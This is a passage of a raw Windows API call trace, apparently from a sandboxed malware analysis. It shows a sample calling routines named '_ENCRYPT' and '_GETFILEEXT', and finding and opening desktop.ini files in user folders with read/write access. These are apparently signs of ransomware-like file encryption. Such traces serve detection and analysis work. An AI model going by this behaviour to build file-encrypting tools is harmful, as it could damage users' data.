dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.130] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.130] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.130] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.130] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.130] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.130] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.131] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.131] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.131] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.131] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.131] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.132] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.132] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.132] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.132] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.132] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.132] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.134] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.134] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.134] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.135] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.135] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.135] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.135] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.135] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.135] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.136] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.136] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.136] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.137] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.137] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.137] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.137] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.137] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.137] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.137] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 